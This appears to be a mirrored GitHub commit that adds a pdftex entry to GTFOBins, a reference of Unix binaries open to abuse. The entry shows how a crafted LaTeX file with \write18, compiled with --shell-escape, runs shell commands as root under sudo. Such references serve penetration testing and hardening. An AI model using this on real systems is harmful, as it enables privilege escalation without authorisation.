mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-07-25 19:54:14 +02:00
Create pdftex.md
Add pdftex.
This commit is contained in:
6
_gtfobins/pdftex.md
Normal file
6
_gtfobins/pdftex.md
Normal file
@@ -0,0 +1,6 @@
|
||||
description: `pdftex` has a similar behaviour as [`tex`](/gtfobins/tex/)
|
||||
functions:
|
||||
sudo:
|
||||
- code: |
|
||||
echo "\documentclass[12pt]{article} \begin{document} \write18{/usr/bin/id} \end{document}" > file.tex
|
||||
pdftex -interaction=nonstopmode --shell-escape file.tex
|
Reference in New Issue
Block a user